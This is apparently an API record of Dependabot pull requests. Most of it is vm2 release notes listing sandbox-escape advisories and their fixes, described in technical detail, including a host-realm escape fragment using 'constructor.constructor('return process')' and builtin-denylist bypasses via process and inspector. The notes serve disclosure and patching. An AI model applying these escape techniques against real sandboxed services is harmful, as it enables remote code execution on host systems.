\u003ccode\u003estrictErrors\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecache\u003c/code\u003e - caching and all related options and methods have been removed\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.unixify\u003c/code\u003e was renamed to \u003ccode\u003eoptions.windows\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.nodupes\u003c/code\u003e Was removed. Duplicates are always removed by default. You can override this with custom behavior by using the \u003ccode\u003eonMatch\u003c/code\u003e, \u003ccode\u003eonResult\u003c/code\u003e and \u003ccode\u003eonIgnore\u003c/code\u003e functions.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.snapdragon\u003c/code\u003e was removed, as snapdragon is no longer used.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.sourcemap\u003c/code\u003e was removed, as snapdragon is no longer used, which provided sourcemap support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.0.0] - 2017-04-11\u003c/h2\u003e\n\u003cp\u003eComplete overhaul, with 36,000+ new unit tests validated against actual output generated by Bash and minimatch. More specifically, 35,000+ of the tests:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003emicromatch results are directly compared to bash results\u003c/li\u003e\n\u003cli\u003ein rare cases, when micromatch and bash disagree, micromatch's results are compared to minimatch's results\u003c/li\u003e\n\u003cli\u003emicromatch is much more accurate than minimatch, so there were cases where I had to make assumptions. I'll try to document these.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThis refactor introduces a parser and compiler that are supersets of more granular parsers and compilers from other sub-modules. Each of these sub-modules has a singular responsibility and focuses on a certain type of matching that aligns with a specific part of the Bash \u0026quot;expansion\u0026quot; API.\u003c/p\u003e\n\u003cp\u003eThese sub-modules work like plugi...\n\n_Description has been truncated_\n\n\u003c!-- This is an auto-generated comment: release notes by coderabbit.ai --\u003e\n\n## Summary by CodeRabbit\n\n## Chores\n\n* 開発用ビルドツールを最新版にアップグレードしました。ビルドプロセスのパフォーマンス改善とバグ修正が反映されます。\n\n\u003c!-- end of auto-generated comment: release notes by coderabbit.ai --\u003e","html_url":"https://github.com/geolonia/michinori.geolonia.com/pull/21","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/geolonia%2Fmichinori.geolonia.com/issues/21","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/21/packages"},{"uuid":"4566487408","node_id":"PR_kwDOPNqpOc7hiOjQ","number":25,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 22 directories with 7 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-01T23:13:36.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-01T21:17:30.000Z","updated_at":"2026-06-01T23:13:38.000Z","time_to_close":6966,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":7,"packages":[{"name":"vm2","old_version":"3.9.19","new_version":"3.11.5","repository_url":"https://github.com/patriksimek/vm2"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"4.15.2","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"next","old_version":"14.2.28","new_version":"15.5.18","repository_url":"https://github.com/vercel/next.js"},{"name":"uuid","old_version":"10.0.0","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"vitest","old_version":"0.34.3","new_version":"4.1.0","repository_url":"https://github.com/vitest-dev/vitest"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 2 updates in the / directory: [vm2](https://github.com/patriksimek/vm2) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /docs/api_refs directory: [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 1 update in the /docs/core_docs directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /environment_tests/test-exports-cf directory: [vitest](https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest).\nBumps the npm_and_yarn group with 1 update in the /environment_tests/test-exports-vercel directory: [next](https://github.com/vercel/next.js).\nBumps the npm_and_yarn group with 3 updates in the /examples directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk), [uuid](https://github.com/uuidjs/uuid) and [axios](https://github.com/axios/axios).\nBumps the npm_and_yarn group with 3 updates in the /langchain directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk), [uuid](https://github.com/uuidjs/uuid) and [axios](https://github.com/axios/axios).\nBumps the npm_and_yarn group with 2 updates in the /langchain-core directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-azure-dynamic-sessions directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-cerebras directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-cloudflare directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-cohere directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /libs/langchain-community directory: [langsmith](https://github.com/langchain-ai/langsmith-sdk) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-google-common directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-mcp-adapters directory: [vitest](https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-mistralai directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-mongodb directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-ollama directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-pinecone directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-qdrant directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-redis directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /libs/langchain-weaviate directory: [uuid](https://github.com/uuidjs/uuid).\n\nUpdates `vm2` from 3.9.19 to 3.11.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patriksimek/vm2/releases\"\u003evm2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.11.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/566\"\u003e#566\u003c/a\u003e\u003c/strong\u003e — Restore \u003ccode\u003eutil.inspect\u003c/code\u003e output on Node 26+. \u003ccode\u003econsole.log(vm.run(...))\u003c/code\u003e was rendering as \u003ccode\u003eProxy(Proxy({}))\u003c/code\u003e / \u003ccode\u003eProxy(Proxy([]))\u003c/code\u003e instead of the underlying value. Triggered by Node 26's stricter handling of nested proxies in the inspector.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/567\"\u003e#567\u003c/a\u003e\u003c/strong\u003e — Restore array iteration on \u003ccode\u003evm.freeze()\u003c/code\u003e'd host arrays. Calling \u003ccode\u003e.map()\u003c/code\u003e / \u003ccode\u003e.filter()\u003c/code\u003e / \u003ccode\u003e.forEach()\u003c/code\u003e etc. inside the sandbox on a frozen host object containing arrays threw\n\u003ccode\u003eTypeError: 'isExtensible' on proxy: trap result does not reflect extensibility of proxy target\u003c/code\u003e. Regression from the 3.11.0 proxy-invariant hardening.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/pull/568\"\u003e#568\u003c/a\u003e\u003c/strong\u003e — Fix \u003ccode\u003e.node\u003c/code\u003e extension handler key in \u003ccode\u003elib/resolver.js\u003c/code\u003e (the key was \u003ccode\u003e' .node'\u003c/code\u003e with a leading space, so native addon resolution silently fell through to the default path). Thanks to \u003ca href=\"https://github.com/cherr-cc\"\u003e\u003ccode\u003e@​cherr-cc\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade Notes\u003c/h2\u003e\n\u003cp\u003eDrop-in replacement for 3.11.4. No API or configuration changes.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/patriksimek/vm2/compare/v3.11.4...v3.11.5\"\u003ehttps://github.com/patriksimek/vm2/compare/v3.11.4...v3.11.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.11.4\u003c/h2\u003e\n\u003cp\u003eTen advisories closed. Patch release — no API changes for valid configurations.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eSecurity fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-c4cf-2hgv-2qv6\u003c/strong\u003e — Bridge \u003ccode\u003eset\u003c/code\u003e trap ignoring ECMA-262 §9.5.9 \u003ccode\u003eReceiver\u003c/code\u003e, letting \u003ccode\u003eObject.create(hostObj)\u003c/code\u003e children and \u003ccode\u003eReflect.set(hostObj, k, v, custom)\u003c/code\u003e writes leak onto the host object (write-channel → RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m5q2-4fm3-vfqp\u003c/strong\u003e — Cross-realm \u003ccode\u003eSymbol.for\u003c/code\u003e namespace leak + missing dangerous-symbol guards on the bridge's write traps (\u003ccode\u003eset\u003c/code\u003e / \u003ccode\u003edefineProperty\u003c/code\u003e / \u003ccode\u003edeleteProperty\u003c/code\u003e), enabling sandbox-installed \u003ccode\u003enodejs.util.promisify.custom\u003c/code\u003e / stream brand / webstream hooks on host objects (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-v6mx-mf47-r5wg\u003c/strong\u003e — Host prototype mutation via \u003ccode\u003eFunction.prototype.{call,apply,bind}\u003c/code\u003e and \u003ccode\u003eReflect.{apply,construct}\u003c/code\u003e indirection through \u003ccode\u003eObject.prototype.__proto__\u003c/code\u003e setter, severing host intrinsic prototype chains and escaping via \u003ccode\u003ethisEnsureThis\u003c/code\u003e proto-walk fallthrough (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-q3fm-4wcw-g57x\u003c/strong\u003e — Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/11\"\u003e#11\u003c/a\u003e violation in \u003ccode\u003edefaultSandboxPrepareStackTrace\u003c/code\u003e (second variant of GHSA-9qj6-qjgg-37qq in a different file): sandbox-installed \u003ccode\u003eArray.prototype[N]\u003c/code\u003e setter / \u003ccode\u003eArray.prototype.join\u003c/code\u003e override could observe bridge-internal stack-trace state.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-76w7-j9cq-rx2j\u003c/strong\u003e — Promise species hijack in \u003ccode\u003elocalPromise\u003c/code\u003e's swallow-tail, hijacking the downstream child constructor to capture V8's internal \u003ccode\u003e(resolve, reject)\u003c/code\u003e capability and reach a raw host-realm error → host \u003ccode\u003eFunction\u003c/code\u003e (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m4wx-m65x-ghrr\u003c/strong\u003e — NodeVM constructor patch bypass of GHSA-8hg8-63c5-gwmx: any truthy \u003ccode\u003enesting\u003c/code\u003e paired with a non-real-config \u003ccode\u003erequire\u003c/code\u003e produced a NESTING_OVERRIDE-only resolver → inner NodeVM with attacker-chosen \u003ccode\u003erequire\u003c/code\u003e → \u003ccode\u003echild_process\u003c/code\u003e RCE.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-6j2x-vhqr-qr7q\u003c/strong\u003e — WebAssembly JSPI (\u003ccode\u003eWebAssembly.promising\u003c/code\u003e / \u003ccode\u003eWebAssembly.Suspending\u003c/code\u003e, Node 24+ behind a flag, Node 26+ default) producing Promise objects with a host-realm \u003ccode\u003e[[Prototype]]\u003c/code\u003e chain and no bridge interposition; species hijack delivers a raw host-realm rejection to sandbox \u003ccode\u003e.catch\u003c/code\u003e → host \u003ccode\u003eFunction\u003c/code\u003e (RCE).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-rp36-8xq3-r6c4\u003c/strong\u003e — NodeVM builtin denylist bypass via \u003ccode\u003eprocess\u003c/code\u003e (whose \u003ccode\u003egetBuiltinModule(name)\u003c/code\u003e reloads any core module regardless of allow/deny config) and \u003ccode\u003einspector/promises\u003c/code\u003e (whose \u003ccode\u003eSession().post('Runtime.evaluate', ...)\u003c/code\u003e evaluates attacker JS in the host realm). Supersedes GHSA-947f-4v7f-x2v8.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-r9pm-gxmw-wv6p\u003c/strong\u003e — NodeVM \u003ccode\u003ebuiltin: ['*']\u003c/code\u003e wildcard exposing Node's undocumented underscored network builtins (\u003ccode\u003e_http_client\u003c/code\u003e, \u003ccode\u003e_http_server\u003c/code\u003e, \u003ccode\u003e_tls_*\u003c/code\u003e, \u003ccode\u003e_stream_*\u003c/code\u003e) even when the documented \u003ccode\u003e-http\u003c/code\u003e/\u003ccode\u003e-https\u003c/code\u003e/\u003ccode\u003e-net\u003c/code\u003e/\u003ccode\u003e-tls\u003c/code\u003e exclusions were used — SSRF-class capability bypass (CVSS 8.6).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9g8x-92q2-p28f\u003c/strong\u003e — NodeVM builtin allowlist surfacing four process-wide observability builtins (\u003ccode\u003ediagnostics_channel\u003c/code\u003e, \u003ccode\u003easync_hooks\u003c/code\u003e, \u003ccode\u003eperf_hooks\u003c/code\u003e, \u003ccode\u003ev8\u003c/code\u003e) that read state of the entire host process rather than sandbox-local state — HTTP header / async-context / perf-mark / heap-snapshot exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDocumentation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/blob/main/docs/ATTACKS.md\"\u003e\u003ccode\u003edocs/ATTACKS.md\u003c/code\u003e\u003c/a\u003e extended through Category 35, plus two new Defense Invariants: \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/12\"\u003e#12\u003c/a\u003e\u003c/strong\u003e (\u0026quot;No sandbox-visible object has a host-realm prototype chain without bridge interposition\u0026quot;) and \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/13\"\u003e#13\u003c/a\u003e\u003c/strong\u003e (\u0026quot;The NodeVM builtin allowlist is a closed system\u0026quot;).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade Notes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eIf you constructed \u003ccode\u003eNodeVM({ nesting: \u0026lt;truthy\u0026gt; })\u003c/code\u003e without an explicit \u003ccode\u003erequire\u003c/code\u003e config object\u003c/strong\u003e, \u003ccode\u003enew NodeVM(...)\u003c/code\u003e now throws (GHSA-m4wx-m65x-ghrr). This covers every shape that previously silently produced a \u003ccode\u003evm2\u003c/code\u003e-only resolver: omitting \u003ccode\u003erequire\u003c/code\u003e, or setting it to any falsy value (\u003ccode\u003efalse\u003c/code\u003e/\u003ccode\u003eundefined\u003c/code\u003e/\u003ccode\u003enull\u003c/code\u003e/\u003ccode\u003e0\u003c/code\u003e/\u003ccode\u003e''\u003c/code\u003e) or any truthy non-object value (\u003ccode\u003etrue\u003c/code\u003e/number/string/symbol/function); and also any truthy \u003ccode\u003enesting\u003c/code\u003e value, not only \u003ccode\u003enesting: true\u003c/code\u003e. Either drop \u003ccode\u003enesting\u003c/code\u003e, or pass an explicit \u003ccode\u003erequire\u003c/code\u003e config object (e.g. \u003ccode\u003erequire: { builtin: [] }\u003c/code\u003e) to acknowledge that vm2 will be requireable from inside the sandbox. The error message is actionable and links to the README hardening section.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo other valid configurations are affected.\u003c/strong\u003e Embedders who explicitly listed any of \u003ccode\u003eprocess\u003c/code\u003e / \u003ccode\u003einspector\u003c/code\u003e / \u003ccode\u003eworker_threads\u003c/code\u003e / \u003ccode\u003ecluster\u003c/code\u003e / \u003ccode\u003evm\u003c/code\u003e / \u003ccode\u003erepl\u003c/code\u003e / \u003ccode\u003emodule\u003c/code\u003e / \u003ccode\u003etrace_events\u003c/code\u003e / \u003ccode\u003ewasi\u003c/code\u003e / \u003ccode\u003ediagnostics_channel\u003c/code\u003e / \u003ccode\u003easync_hooks\u003c/code\u003e / \u003ccode\u003eperf_hooks\u003c/code\u003e / \u003ccode\u003ev8\u003c/code\u003e in \u003ccode\u003ebuiltin\u003c/code\u003e were already running an unsandboxed sandbox; those names now throw at load time and can be re-introduced as safe wrappers via \u003ccode\u003emock\u003c/code\u003e / \u003ccode\u003eoverride\u003c/code\u003e / \u003ccode\u003eSPECIAL_MODULES\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/patriksimek/vm2/compare/v3.11.3...v3.11.4\"\u003ehttps://github.com/patriksimek/vm2/compare/v3.11.3...v3.11.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.11.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eSecurity fix\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/patriksimek/vm2/blob/main/CHANGELOG.md\"\u003evm2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.11.5]\u003c/h2\u003e\n\u003cp\u003ePatch release — no API changes.\u003c/p\u003e\n\u003ch3\u003eFix\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/566\"\u003e#566\u003c/a\u003e\u003c/strong\u003e — \u003ccode\u003eutil.inspect\u003c/code\u003e of \u003ccode\u003evm.run(...)\u003c/code\u003e results rendered as \u003ccode\u003eProxy(Proxy({}))\u003c/code\u003e on Node 26+. Install \u003ccode\u003enodejs.util.inspect.custom\u003c/code\u003e on host-side proxy targets so the inspect output reflects the underlying shape.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/567\"\u003e#567\u003c/a\u003e\u003c/strong\u003e — Array iteration methods on a \u003ccode\u003evm.freeze()\u003c/code\u003e-d host array threw an \u003ccode\u003e'isExtensible' on proxy\u003c/code\u003e invariant error (regression from the GHSA-grj5-jjm8-h35p species defense). Align the ReadOnly proxy target's extensibility with its trap result and skip species neutralization on the host→sandbox apply path.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.4]\u003c/h2\u003e\n\u003cp\u003eTen advisories closed. Patch release — no API changes for valid configurations.\u003c/p\u003e\n\u003ch3\u003eSecurity fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-c4cf-2hgv-2qv6\u003c/strong\u003e — bridge escape via \u003ccode\u003eBaseHandler.set\u003c/code\u003e ignoring the ECMA-262 §9.5.9 \u003ccode\u003eReceiver\u003c/code\u003e argument; \u003ccode\u003eObject.create(hostProxy).x = v\u003c/code\u003e and \u003ccode\u003eReflect.set(hostProxy, k, v, sandboxObj)\u003c/code\u003e wrote through to the host object instead of installing on the receiver, turning every embedder-exposed host object into a sandbox write channel. Receiver-gated install-on-receiver fix in \u003ccode\u003elib/bridge.js\u003c/code\u003e mirroring \u003ccode\u003eReadOnlyHandler.set\u003c/code\u003e. See ATTACKS.md Category 32 and \u003ccode\u003etest/ghsa/GHSA-c4cf-2hgv-2qv6/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m5q2-4fm3-vfqp\u003c/strong\u003e — sandbox escape via unblocked cross-realm \u003ccode\u003eSymbol.for\u003c/code\u003e keys plus missing dangerous-symbol guards on the bridge's write traps. Two-layer structural fix: \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e denies the entire \u003ccode\u003enodejs.\u003c/code\u003e namespace at \u003ccode\u003eSymbol.for\u003c/code\u003e and aligns the read-side filters with the full 9-symbol cache, and \u003ccode\u003elib/bridge.js\u003c/code\u003e extends \u003ccode\u003eisDangerousCrossRealmSymbol\u003c/code\u003e and applies it to the \u003ccode\u003eset\u003c/code\u003e/\u003ccode\u003edefineProperty\u003c/code\u003e/\u003ccode\u003edeleteProperty\u003c/code\u003e traps. See ATTACKS.md Category 8 / Category 20 (both extended) and \u003ccode\u003etest/ghsa/GHSA-m5q2-4fm3-vfqp/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-v6mx-mf47-r5wg\u003c/strong\u003e — host prototype mutation via apply-trap indirection. Sandbox code could reach host prototype-mutating setters (\u003ccode\u003eObject.prototype.__proto__\u003c/code\u003e, \u003ccode\u003esetPrototypeOf\u003c/code\u003e, \u003ccode\u003edefineProperty\u003c/code\u003e, \u003ccode\u003e__defineSetter__\u003c/code\u003e/\u003ccode\u003e__defineGetter__\u003c/code\u003e) through \u003ccode\u003eFunction.prototype.{call,apply,bind}\u003c/code\u003e and \u003ccode\u003eReflect.{apply,construct}\u003c/code\u003e indirection, sever a host intrinsic's prototype chain, and escape via the bridge's \u003ccode\u003ethisEnsureThis\u003c/code\u003e proto-walk fallthrough. Two-layer structural fix in \u003ccode\u003elib/bridge.js\u003c/code\u003e (apply-trap blocklist + cache check before proto-walk). See ATTACKS.md Category 30 and \u003ccode\u003etest/ghsa/GHSA-v6mx-mf47-r5wg/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-q3fm-4wcw-g57x\u003c/strong\u003e — Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/11\"\u003e#11\u003c/a\u003e hardening for \u003ccode\u003edefaultSandboxPrepareStackTrace\u003c/code\u003e (second variant of GHSA-9qj6-qjgg-37qq in a different file). The sandbox stack-trace formatter accumulated frames in a sandbox-realm array and \u003ccode\u003e.join\u003c/code\u003e-ed them, so a sandbox-installed setter on \u003ccode\u003eArray.prototype[N]\u003c/code\u003e (or \u003ccode\u003e.join\u003c/code\u003e override) observed bridge-internal state — no host reference reachable today, but one enrichment away from regressing into the GHSA-9qj6 RCE shape. Fixed in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e by folding frames through a primitive string accumulator (no \u003ccode\u003eArray.prototype\u003c/code\u003e slot reachable) and converting \u003ccode\u003emakeCallSiteGetters\u003c/code\u003e to \u003ccode\u003elocalReflectDefineProperty\u003c/code\u003e for symmetry. See ATTACKS.md Category 28 Variant B and \u003ccode\u003etest/ghsa/GHSA-q3fm-4wcw-g57x/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-76w7-j9cq-rx2j\u003c/strong\u003e — Promise species hijack in the \u003ccode\u003elocalPromise\u003c/code\u003e swallow tail. The swallow-tail \u003ccode\u003eapply(globalPromisePrototypeThen, this, [...])\u003c/code\u003e call inside \u003ccode\u003elocalPromise\u003c/code\u003e's constructor invoked the cached host \u003ccode\u003ePromise.prototype.then\u003c/code\u003e without first calling \u003ccode\u003eresetPromiseSpecies(this)\u003c/code\u003e, so a sandbox subclass overriding \u003ccode\u003e[Symbol.species]\u003c/code\u003e could redirect the downstream child constructor to a user function and capture V8's internal \u003ccode\u003e(resolve, reject)\u003c/code\u003e capability — delivering a raw host-realm error (RangeError from deep recursion + \u003ccode\u003ee.stack\u003c/code\u003e) to a sandbox collector and reaching the host \u003ccode\u003eFunction\u003c/code\u003e constructor via \u003ccode\u003e.constructor.constructor\u003c/code\u003e. One-line fix in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e adds the missing \u003ccode\u003eresetPromiseSpecies(this)\u003c/code\u003e before the swallow-tail call, matching the pattern already used by the \u003ccode\u003e.then\u003c/code\u003e/\u003ccode\u003e.catch\u003c/code\u003e/\u003ccode\u003eReflect.apply\u003c/code\u003e overrides. See ATTACKS.md Category 31 and \u003ccode\u003etest/ghsa/GHSA-76w7-j9cq-rx2j/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-m4wx-m65x-ghrr\u003c/strong\u003e — NodeVM constructor patch bypass of GHSA-8hg8-63c5-gwmx: a truthy \u003ccode\u003enesting\u003c/code\u003e paired with anything other than a real \u003ccode\u003erequire\u003c/code\u003e config object produced a NESTING_OVERRIDE-only resolver → inner NodeVM with attacker-chosen \u003ccode\u003erequire\u003c/code\u003e → \u003ccode\u003echild_process\u003c/code\u003e RCE. Structural fix in \u003ccode\u003elib/nodevm.js\u003c/code\u003e: destructure first, then reject at construction whenever \u003ccode\u003enesting\u003c/code\u003e is truthy and \u003ccode\u003erequireOpts\u003c/code\u003e is not a non-null object or \u003ccode\u003eResolver\u003c/code\u003e. Supersedes GHSA-8hg8-63c5-gwmx. See ATTACKS.md Category 25 and \u003ccode\u003etest/ghsa/GHSA-m4wx-m65x-ghrr/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-6j2x-vhqr-qr7q\u003c/strong\u003e — sandbox escape via WebAssembly JSPI (Node 24 behind \u003ccode\u003e--experimental-wasm-jspi\u003c/code\u003e, Node 26+ default). \u003ccode\u003eWebAssembly.promising\u003c/code\u003e returns Promise objects whose \u003ccode\u003e[[Prototype]]\u003c/code\u003e chain points directly at the host realm's \u003ccode\u003ePromise.prototype\u003c/code\u003e with no bridge proxy in between, so \u003ccode\u003ep.finally()\u003c/code\u003e reaches host \u003ccode\u003ePromise.prototype.finally\u003c/code\u003e, V8's \u003ccode\u003eSpeciesConstructor\u003c/code\u003e reads an attacker-controlled \u003ccode\u003ep.constructor\u003c/code\u003e getter, and the eventual host-realm rejection is dispatched through the attacker's class with no bridge wrapping — \u003ccode\u003ee.constructor.constructor('return process')()\u003c/code\u003e then evaluates in the host realm. Structural fix in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e: delete \u003ccode\u003eWebAssembly.promising\u003c/code\u003e and \u003ccode\u003eWebAssembly.Suspending\u003c/code\u003e at sandbox bootstrap, mirroring the existing \u003ccode\u003eWebAssembly.JSTag\u003c/code\u003e removal. Adds Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/12\"\u003e#12\u003c/a\u003e (no sandbox-visible object may have a host-realm prototype chain without bridge interposition). See ATTACKS.md Category 33 and \u003ccode\u003etest/ghsa/GHSA-6j2x-vhqr-qr7q/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-rp36-8xq3-r6c4\u003c/strong\u003e — NodeVM builtin denylist bypass via \u003ccode\u003eprocess\u003c/code\u003e and \u003ccode\u003einspector/promises\u003c/code\u003e. The exact-match denylist in \u003ccode\u003elib/builtin.js\u003c/code\u003e missed two host-passthrough families: \u003ccode\u003eprocess\u003c/code\u003e (whose \u003ccode\u003egetBuiltinModule(name)\u003c/code\u003e reloads any core module regardless of the embedder's allow/deny configuration) and \u003ccode\u003einspector/promises\u003c/code\u003e (whose \u003ccode\u003eSession().post('Runtime.evaluate', ...)\u003c/code\u003e evaluates attacker JS in the host realm). Structural fix promotes the check to family-prefix via \u003ccode\u003eisDangerousBuiltin(key)\u003c/code\u003e, strips the \u003ccode\u003enode:\u003c/code\u003e URL prefix, and adds \u003ccode\u003eprocess\u003c/code\u003e to the dangerous set — enforced at both \u003ccode\u003eBUILTIN_MODULES\u003c/code\u003e source and \u003ccode\u003eaddDefaultBuiltin\u003c/code\u003e. Supersedes GHSA-947f-4v7f-x2v8. Adds Defense Invariant \u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/13\"\u003e#13\u003c/a\u003e. See ATTACKS.md Category 21 (extended) and \u003ccode\u003etest/ghsa/GHSA-rp36-8xq3-r6c4/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-r9pm-gxmw-wv6p\u003c/strong\u003e — NodeVM \u003ccode\u003ebuiltin: ['*']\u003c/code\u003e wildcard exposed Node's undocumented underscored network builtins (\u003ccode\u003e_http_client\u003c/code\u003e, \u003ccode\u003e_http_server\u003c/code\u003e, the \u003ccode\u003e_http_*\u003c/code\u003e / \u003ccode\u003e_tls_*\u003c/code\u003e / \u003ccode\u003e_stream_*\u003c/code\u003e siblings), letting sandbox code make outbound HTTP requests and open listening sockets even when the documented 